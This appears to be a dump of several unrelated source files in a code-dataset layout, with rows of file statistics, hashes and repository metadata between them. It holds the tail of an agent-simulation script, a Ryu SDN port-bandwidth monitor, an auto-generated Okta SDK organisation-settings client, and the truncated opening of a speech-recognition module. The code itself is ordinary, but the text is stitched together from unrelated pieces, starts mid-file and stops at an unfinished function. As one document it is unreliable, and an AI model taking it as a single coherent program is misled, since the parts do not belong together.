# elif type(agent) is KitRoomAgent:
# if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
# and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
# if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
# self.stable_bath += 1
# elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2))
# and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2):
# if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
# self.stable_bath += 1
# # shortest path finder algorithm
# print(self.astar_algorithm(agent))
# for i in self.astar_path:
# self.move_agent_with_dimensions(i)
if self.stable_bath == 1:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
| 37.395335 | 123 | 0.653496 | 9,668 | 60,917 | 3.977555 | 0.021928 | 0.044416 | 0.068964 | 0.04868 | 0.938838 | 0.93036 | 0.919074 | 0.908178 | 0.891848 | 0.88415 | 0 | 0.027663 | 0.210762 | 60,917 | 1,628 | 124 | 37.418305 | 0.772183 | 0.194511 | 0 | 0.841283 | 0 | 0 | 0.006968 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027138 | false | 0 | 0.004934 | 0 | 0.066612 | 0.001645 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
db3c02fdb929ef66f0f988d3be954192e602757e | 15,235 | py | Python | myapp/observed_state.py | hebinjie33/HMMLB | db26a149fd3e8e96a570cfe32e9bc42a002409cc | [
"Apache-2.0"
] | null | null | null | myapp/observed_state.py | hebinjie33/HMMLB | db26a149fd3e8e96a570cfe32e9bc42a002409cc | [
"Apache-2.0"
] | null | null | null | myapp/observed_state.py | hebinjie33/HMMLB | db26a149fd3e8e96a570cfe32e9bc42a002409cc | [
"Apache-2.0"
] | 1 | 2019-12-16T21:46:46.000Z | 2019-12-16T21:46:46.000Z | import httplib2
import time
import json
"""
The S7_Port1 total bandwidth is 1 Gbits/s
The S4_Port2 total bandwidth is 1 Gbits/s
The S5_Port2 total bandwidth is 1 Gbits/s
The S6_Port2 total bandwidth is 1 Gbits/s
the reason of the setting is the experimental topology is a part of fat-tree
, and we consider the affect of other parts of fat-tree, and in order to demostrate the Hmm algorithm performance.
"""
class ryu_bandwidth_monitor:
url = ''
data_before = [0 for i in range(13)] # 0 ~ 13 are S7-PORT2 S5-PORT1 S1-PORT2 S9-PORT4 S11-PORT3 S5-PORT2 S2-PORT4 S7-PORT1 S6-PORT1 S3-PORT1 S10-PORT3 S6-PORT2 S4-PORT2 flow_rate
data_after = [0 for i in range(13)] #so the link1 is 0 1 2 3 4, link2 is 0 5 6 3 4, link3 is 7 8 9 10 4, link4 is 7 11 12 10 4 flow_rate is 13
def __init__(self, host, port):
self.url = 'http://' + host + ':' + str(port) + '/index.html'
def get_flow_rate_before(self,src_ip):
http = httplib2.Http()
headers = {'Accept': 'application/json'}
if(src_ip == '10.0.0.1'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/flow/7', headers=headers) #observed the flow_rate,this code need revise
json_data = content.decode()
data = json.loads(json_data)
k = 0
while(data['7'][k]['cookie'] != 10):
k = k+1
self.data_before[12] = data['7'][k]['byte_count'] #need revise
if(src_ip == '10.0.0.2'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/flow/7', headers=headers) #observed the flow_rate,this code need revise
json_data = content.decode()
data = json.loads(json_data)
k = 0
while(data['7'][k]['cookie'] != 11):
k = k+1
self.data_before[12] = data['7'][k]['byte_count'] #need revise
if(src_ip == '10.0.0.3'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/flow/8', headers=headers) #observed the flow_rate,this code need revise
json_data = content.decode()
data = json.loads(json_data)
k = 0
while(data['8'][k]['cookie'] != 11):
k = k+1
self.data_before[12] = data['8'][k]['byte_count'] #need revise
if(src_ip == '10.0.0.4'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/flow/8', headers=headers) #observed the flow_rate,this code need revise
json_data = content.decode()
data = json.loads(json_data)
k = 0
while(data['8'][k]['cookie'] != 10):
k = k+1
self.data_before[12] = data['8'][k]['byte_count'] #need revise
if(src_ip == '10.0.0.5'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/flow/11', headers=headers) #observed the flow_rate,this code need revise
json_data = content.decode()
data = json.loads(json_data)
k = 0
while(data['11'][k]['cookie'] != 11):
k = k+1
self.data_before[12] = data['11'][k]['byte_count'] #need revise
if(src_ip == '10.0.0.6'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/flow/11', headers=headers) #observed the flow_rate,this code need revise
json_data = content.decode()
data = json.loads(json_data)
k = 0
while(data['11'][k]['cookie'] != 10):
k = k+1
self.data_before[12] = data['11'][k]['byte_count'] #need revise
if(src_ip == '10.0.0.7'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/flow/12', headers=headers) #observed the flow_rate,this code need revise
json_data = content.decode()
data = json.loads(json_data)
k = 0
while(data['12'][k]['cookie'] != 10):
k = k+1
self.data_before[12] = data['12'][k]['byte_count'] #need revise
if(src_ip == '10.0.0.8'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/flow/12', headers=headers) #observed the flow_rate,this code need revise
json_data = content.decode()
data = json.loads(json_data)
k = 0
while(data['12'][k]['cookie'] != 11):
k = k+1
self.data_before[12] = data['12'][k]['byte_count'] #need revise
#print(self.data_before[12])
def get_flow_rate_after(self,src_ip):
http = httplib2.Http()
headers = {'Accept': 'application/json'}
if(src_ip == '10.0.0.1'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/flow/7', headers=headers) #observed the flow_rate,this code need revise
json_data = content.decode()
data = json.loads(json_data)
k = 0
while(data['7'][k]['cookie'] != 10):
k = k+1
self.data_after[12] = data['7'][k]['byte_count'] #need revise
if(src_ip == '10.0.0.2'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/flow/7', headers=headers) #observed the flow_rate,this code need revise
json_data = content.decode()
data = json.loads(json_data)
k = 0
while(data['7'][k]['cookie'] != 11):
k = k+1
self.data_after[12] = data['7'][k]['byte_count'] #need revise
if(src_ip == '10.0.0.3'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/flow/8', headers=headers) #observed the flow_rate,this code need revise
json_data = content.decode()
data = json.loads(json_data)
k = 0
while(data['8'][k]['cookie'] != 11):
k = k+1
self.data_after[12] = data['8'][k]['byte_count'] #need revise
if(src_ip == '10.0.0.4'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/flow/8', headers=headers) #observed the flow_rate,this code need revise
json_data = content.decode()
data = json.loads(json_data)
k = 0
while(data['8'][k]['cookie'] != 10):
k = k+1
self.data_after[12] = data['8'][k]['byte_count'] #need revise
if(src_ip == '10.0.0.5'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/flow/11', headers=headers) #observed the flow_rate,this code need revise
json_data = content.decode()
data = json.loads(json_data)
k = 0
while(data['11'][k]['cookie'] != 11):
k = k+1
self.data_after[12] = data['11'][k]['byte_count'] #need revise
if(src_ip == '10.0.0.6'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/flow/11', headers=headers) #observed the flow_rate,this code need revise
json_data = content.decode()
data = json.loads(json_data)
k = 0
while(data['11'][k]['cookie'] != 10):
k = k+1
self.data_after[12] = data['11'][k]['byte_count'] #need revise
if(src_ip == '10.0.0.7'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/flow/12', headers=headers) #observed the flow_rate,this code need revise
json_data = content.decode()
data = json.loads(json_data)
k = 0
while(data['12'][k]['cookie'] != 10):
k = k+1
self.data_after[12] = data['12'][k]['byte_count'] #need revise
if(src_ip == '10.0.0.8'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/flow/12', headers=headers) #observed the flow_rate,this code need revise
json_data = content.decode()
data = json.loads(json_data)
k = 0
while(data['12'][k]['cookie'] != 11):
k = k+1
self.data_after[12] = data['12'][k]['byte_count'] #need revise
#print(self.data_after[12])
def caculate_flow_rate(self,time):
flow_rate = float((self.data_after[12]-self.data_before[12])*8/time)
return flow_rate
def get_databefore(self,src_ip):
http = httplib2.Http()
headers = {'Accept': 'application/json'}
if(src_ip == '10.0.0.1' or src_ip == '10.0.0.2' or src_ip == '10.0.0.3' or src_ip == '10.0.0.4'):
if(src_ip == '10.0.0.1' or src_ip == '10.0.0.2'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/7/1', headers=headers) #S7_Port1
json_data = content.decode()
data = json.loads(json_data)
self.data_before[0] = data['7'][0]['tx_bytes']
if(src_ip == '10.0.0.3' or src_ip == '10.0.0.4'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/8/1', headers=headers) #S8_Port1
json_data = content.decode()
data = json.loads(json_data)
self.data_before[0] = data['8'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/5/2', headers=headers) #S5_Port2
json_data = content.decode()
data = json.loads(json_data)
self.data_before[3] = data['5'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/6/2', headers=headers) #S6_Port2
json_data = content.decode()
data = json.loads(json_data)
self.data_before[5] = data['6'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/4/3', headers=headers) #S4_Port3
json_data = content.decode()
data = json.loads(json_data)
self.data_before[9] = data['4'][0]['tx_bytes']
if(src_ip == '10.0.0.5' or src_ip == '10.0.0.6' or src_ip == '10.0.0.7' or src_ip == '10.0.0.8'):
if(src_ip == '10.0.0.5' or src_ip == '10.0.0.6'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/11/1', headers=headers) #S11_Port1
json_data = content.decode()
data = json.loads(json_data)
self.data_before[0] = data['11'][0]['tx_bytes']
if(src_ip == '10.0.0.7' or src_ip == '10.0.0.8'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/12/1', headers=headers) #S12_Port1
json_data = content.decode()
data = json.loads(json_data)
self.data_before[0] = data['12'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/9/2', headers=headers) #S9_Port2
json_data = content.decode()
data = json.loads(json_data)
self.data_before[3] = data['9'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/10/2', headers=headers) #S10_Port2
json_data = content.decode()
data = json.loads(json_data)
self.data_before[5] = data['10'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/4/4', headers=headers) #S4_Port4
json_data = content.decode()
data = json.loads(json_data)
self.data_before[9] = data['4'][0]['tx_bytes']
def get_dataafter(self,src_ip):
http = httplib2.Http()
headers = {'Accept': 'application/json'}
if(src_ip == '10.0.0.1' or src_ip == '10.0.0.2' or src_ip == '10.0.0.3' or src_ip == '10.0.0.4'):
if(src_ip == '10.0.0.1' or src_ip == '10.0.0.2'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/7/1', headers=headers) #S7_Port1
json_data = content.decode()
data = json.loads(json_data)
self.data_after[0] = data['7'][0]['tx_bytes']
if(src_ip == '10.0.0.3' or src_ip == '10.0.0.4'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/8/1', headers=headers) #S8_Port1
json_data = content.decode()
data = json.loads(json_data)
self.data_after[0] = data['8'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/5/2', headers=headers) #S5_Port2
json_data = content.decode()
data = json.loads(json_data)
self.data_after[3] = data['5'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/6/2', headers=headers) #S6_Port2
json_data = content.decode()
data = json.loads(json_data)
self.data_after[5] = data['6'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/4/3', headers=headers) #S4_Port3
json_data = content.decode()
data = json.loads(json_data)
self.data_after[9] = data['4'][0]['tx_bytes']
if(src_ip == '10.0.0.5' or src_ip == '10.0.0.6' or src_ip == '10.0.0.7' or src_ip == '10.0.0.8'):
if(src_ip == '10.0.0.5' or src_ip == '10.0.0.6'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/11/1', headers=headers) #S11_Port1
json_data = content.decode()
data = json.loads(json_data)
self.data_after[0] = data['11'][0]['tx_bytes']
if(src_ip == '10.0.0.7' or src_ip == '10.0.0.8'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/12/1', headers=headers) #S12_Port1
json_data = content.decode()
data = json.loads(json_data)
self.data_after[0] = data['12'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/9/2', headers=headers) #S9_Port2
json_data = content.decode()
data = json.loads(json_data)
self.data_after[3] = data['9'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/10/2', headers=headers) #S10_Port2
json_data = content.decode()
data = json.loads(json_data)
self.data_after[5] = data['10'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/4/4', headers=headers) #S4_Port4
json_data = content.decode()
data = json.loads(json_data)
self.data_after[9] = data['4'][0]['tx_bytes']
def caculate(self,time):
#file = open('/home/ryu/myapp/observed_state.txt','w')
port_rate_1 = float((self.data_after[0]-self.data_before[0])*8/time) # 0 ~ 12 are S7-PORT2 S5-PORT1 S1-PORT2 S9-PORT4 S11-PORT3 S5-PORT2 S2-PORT4 S7-PORT1 S6-PORT1 S3-PORT1 S10-PORT3 S6-PORT2 S4-PORT2
if((port_rate_1/100000000) <= 0.2):
p1 = 1
if(0.2<(port_rate_1/100000000) <0.5 ):
p1 = 2
if((port_rate_1/100000000) >= 0.5):
p1 = 3
port_rate_4 = float((self.data_after[3]-self.data_before[3])*8/time)
if((port_rate_4/100000000) <= 0.2):
p4 = 1
if(0.2<(port_rate_4/100000000) <0.5 ):
p4 = 2
if((port_rate_4/100000000) >= 0.5):
p4 = 3
port_rate_6 = float((self.data_after[5]-self.data_before[5])*8/time)
if((port_rate_6/100000000) <= 0.2):
p6 = 1
if(0.2<(port_rate_6/100000000) <0.5 ):
p6 = 2
if((port_rate_6/100000000) >= 0.5):
p6 = 3
port_rate_10 = float((self.data_after[9]-self.data_before[9])*8/time)
if((port_rate_10/100000000) <= 0.2):
p10 = 1
if(0.2<(port_rate_10/100000000) <0.5 ):
p10 = 2
if((port_rate_10/100000000) >= 0.5):
p10 = 3
print(port_rate_1,port_rate_10,port_rate_4,port_rate_6)
print(p1,p10,p4,p6)
return p1,p10,p4,p6
#ryu=ryu_bandwidth_monitor('192.168.93.137', '8080')
#a =time.time()
#ryu.get_databefore('10.0.0.3')
#time.sleep(0.1)
#b =time.time()
#total= b-a
#ryu.get_dataafter('10.0.0.3')
#ryu.caculate(0.1)
| 40.092105 | 204 | 0.608008 | 2,497 | 15,235 | 3.5835 | 0.056468 | 0.064372 | 0.022351 | 0.042915 | 0.889808 | 0.886455 | 0.870697 | 0.847005 | 0.836612 | 0.836612 | 0 | 0.122536 | 0.210962 | 15,235 | 379 | 205 | 40.197889 | 0.621828 | 0.111979 | 0 | 0.768116 | 0 | 0 | 0.186368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.01087 | null | null | 0.007246 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
db995ae1c55ff2d45a31b544d9434f9afc493d15 | 21,125 | py | Python | okta/resource_clients/org_client.py | ander501/okta-sdk-python | 0927dc6a2f6d5ebf7cd1ea806d81065094c92471 | [
"Apache-2.0"
] | null | null | null | okta/resource_clients/org_client.py | ander501/okta-sdk-python | 0927dc6a2f6d5ebf7cd1ea806d81065094c92471 | [
"Apache-2.0"
] | null | null | null | okta/resource_clients/org_client.py | ander501/okta-sdk-python | 0927dc6a2f6d5ebf7cd1ea806d81065094c92471 | [
"Apache-2.0"
] | null | null | null | """
Copyright 2020 - Present Okta, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# AUTO-GENERATED! DO NOT EDIT FILE DIRECTLY
# SEE CONTRIBUTOR DOCUMENTATION
from okta.models.org_setting\
import OrgSetting
from okta.models.org_contact_type_obj\
import OrgContactTypeObj
from okta.models.org_contact_user\
import OrgContactUser
from okta.models.org_preferences\
import OrgPreferences
from okta.models.org_okta_communication_setting\
import OrgOktaCommunicationSetting
from okta.models.org_okta_support_settings_obj\
import OrgOktaSupportSettingsObj
from okta.utils import format_url
from okta.api_client import APIClient
class OrgClient(APIClient):
"""
A Client object for the Org resource.
"""
def __init__(self):
self._base_url = ""
async def get_org_settings(
self,
keep_empty_params=False
):
"""
Get settings of your organization.
Args:
Returns:
OrgSetting
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgSetting)
if error:
return (None, response, error)
try:
result = OrgSetting(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def partial_update_org_setting(
self, org_setting,
keep_empty_params=False
):
"""
Partial update settings of your organization.
Args:
{org_setting}
Returns:
OrgSetting
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org
""")
if isinstance(org_setting, dict):
body = org_setting
else:
body = org_setting.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgSetting)
if error:
return (None, response, error)
try:
result = OrgSetting(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def update_org_setting(
self, org_setting,
keep_empty_params=False
):
"""
Update settings of your organization.
Args:
{org_setting}
Returns:
OrgSetting
"""
http_method = "put".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org
""")
if isinstance(org_setting, dict):
body = org_setting
else:
body = org_setting.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgSetting)
if error:
return (None, response, error)
try:
result = OrgSetting(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def get_org_contact_types(
self,
keep_empty_params=False
):
"""
Gets Contact Types of your organization.
Args:
Returns:
list: Collection of OrgContactTypeObj instances.
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/contacts
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgContactTypeObj)
if error:
return (None, response, error)
try:
result = []
for item in response.get_body():
result.append(OrgContactTypeObj(
self.form_response_body(item)
))
except Exception as error:
return (None, response, error)
return (result, response, None)
async def get_org_contact_user(
self, contactType,
keep_empty_params=False
):
"""
Retrieves the URL of the User associated with the speci
fied Contact Type.
Args:
contact_type {str}
Returns:
OrgContactUser
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/contacts/{contactType}
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgContactUser)
if error:
return (None, response, error)
try:
result = OrgContactUser(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def update_org_contact_user(
self, contactType, user_id_string,
keep_empty_params=False
):
"""
Updates the User associated with the specified Contact
Type.
Args:
contact_type {str}
{user_id_string}
Returns:
OrgContactUser
"""
http_method = "put".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/contacts/{contactType}
""")
if isinstance(user_id_string, dict):
body = user_id_string
else:
body = user_id_string.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgContactUser)
if error:
return (None, response, error)
try:
result = OrgContactUser(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def update_org_logo(
self, file,
keep_empty_params=False
):
"""
Updates the logo for your organization.
Args:
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/logo
""")
body = {}
headers = {}
form = {
"file": file,
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def get_org_preferences(
self,
keep_empty_params=False
):
"""
Gets preferences of your organization.
Args:
Returns:
OrgPreferences
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/preferences
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgPreferences)
if error:
return (None, response, error)
try:
result = OrgPreferences(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def hide_okta_ui_footer(
self,
keep_empty_params=False
):
"""
Hide the Okta UI footer for all end users of your organ
ization.
Args:
Returns:
OrgPreferences
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/preferences/hideEndUserFooter
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgPreferences)
if error:
return (None, response, error)
try:
result = OrgPreferences(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def show_okta_ui_footer(
self,
keep_empty_params=False
):
"""
Makes the Okta UI footer visible for all end users of y
our organization.
Args:
Returns:
OrgPreferences
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/preferences/showEndUserFooter
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgPreferences)
if error:
return (None, response, error)
try:
result = OrgPreferences(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def get_okta_communication_settings(
self,
keep_empty_params=False
):
"""
Gets Okta Communication Settings of your organization.
Args:
Returns:
OrgOktaCommunicationSetting
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/privacy/oktaCommunication
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgOktaCommunicationSetting)
if error:
return (None, response, error)
try:
result = OrgOktaCommunicationSetting(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def opt_in_users_to_okta_communication_emails(
self,
keep_empty_params=False
):
"""
Opts in all users of this org to Okta Communication ema
ils.
Args:
Returns:
OrgOktaCommunicationSetting
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/privacy/oktaCommunication/optIn
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgOktaCommunicationSetting)
if error:
return (None, response, error)
try:
result = OrgOktaCommunicationSetting(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def opt_out_users_from_okta_communication_emails(
self,
keep_empty_params=False
):
"""
Opts out all users of this org from Okta Communication
emails.
Args:
Returns:
OrgOktaCommunicationSetting
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/privacy/oktaCommunication/optOut
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgOktaCommunicationSetting)
if error:
return (None, response, error)
try:
result = OrgOktaCommunicationSetting(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def get_org_okta_support_settings(
self,
keep_empty_params=False
):
"""
Gets Okta Support Settings of your organization.
Args:
Returns:
OrgOktaSupportSettingsObj
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/privacy/oktaSupport
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgOktaSupportSettingsObj)
if error:
return (None, response, error)
try:
result = OrgOktaSupportSettingsObj(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def extend_okta_support(
self,
keep_empty_params=False
):
"""
Extends the length of time that Okta Support can access
your org by 24 hours. This means that 24 hours are add
ed to the remaining access time.
Args:
Returns:
OrgOktaSupportSettingsObj
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/privacy/oktaSupport/extend
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgOktaSupportSettingsObj)
if error:
return (None, response, error)
try:
result = OrgOktaSupportSettingsObj(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def grant_okta_support(
self,
keep_empty_params=False
):
"""
Enables you to temporarily allow Okta Support to access
your org as an administrator for eight hours.
Args:
Returns:
OrgOktaSupportSettingsObj
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/privacy/oktaSupport/grant
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgOktaSupportSettingsObj)
if error:
return (None, response, error)
try:
result = OrgOktaSupportSettingsObj(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def revoke_okta_support(
self,
keep_empty_params=False
):
"""
Revokes Okta Support access to your organization.
Args:
Returns:
OrgOktaSupportSettingsObj
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/privacy/oktaSupport/revoke
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgOktaSupportSettingsObj)
if error:
return (None, response, error)
try:
result = OrgOktaSupportSettingsObj(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
| 27.50651 | 90 | 0.553941 | 2,086 | 21,125 | 5.393097 | 0.101151 | 0.065511 | 0.068 | 0.063467 | 0.832444 | 0.805067 | 0.772622 | 0.757244 | 0.740267 | 0.7312 | 0 | 0.002154 | 0.362698 | 21,125 | 767 | 91 | 27.542373 | 0.83347 | 0.031574 | 0 | 0.803536 | 0 | 0 | 0.093502 | 0.024855 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001965 | false | 0 | 0.015717 | 0 | 0.151277 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
db9faf8cf96f9e009d63a14d3fa3d6afcd1b5a78 | 12,278 | py | Python | src/alexacloud/alexa/audioprocessing/speechrecognition.py | fausecteam/faustctf-2017-alexa | 53be850957e88642aaaaffd61360195091aaa35c | [
"0BSD"
] | null | null | null | src/alexacloud/alexa/audioprocessing/speechrecognition.py | fausecteam/faustctf-2017-alexa | 53be850957e88642aaaaffd61360195091aaa35c | [
"0BSD"
] | null | null | null | src/alexacloud/alexa/audioprocessing/speechrecognition.py | fausecteam/faustctf-2017-alexa | 53be850957e88642aaaaffd61360195091aaa35c | [
"0BSD"
] | null | null | null | from django.conf import settings
from pydub import AudioSegment
import speech_recognition as sr
import logging
import random
import os
logger = logging.getLogger(__name__)
couldntUnderstandSentences = [
"Can you repeat that please?",
"I beg your pardon?"
]
dontKnowSentences = [
"I don't know.",
"Seriously?"
]
def recognizeText(audioFile):
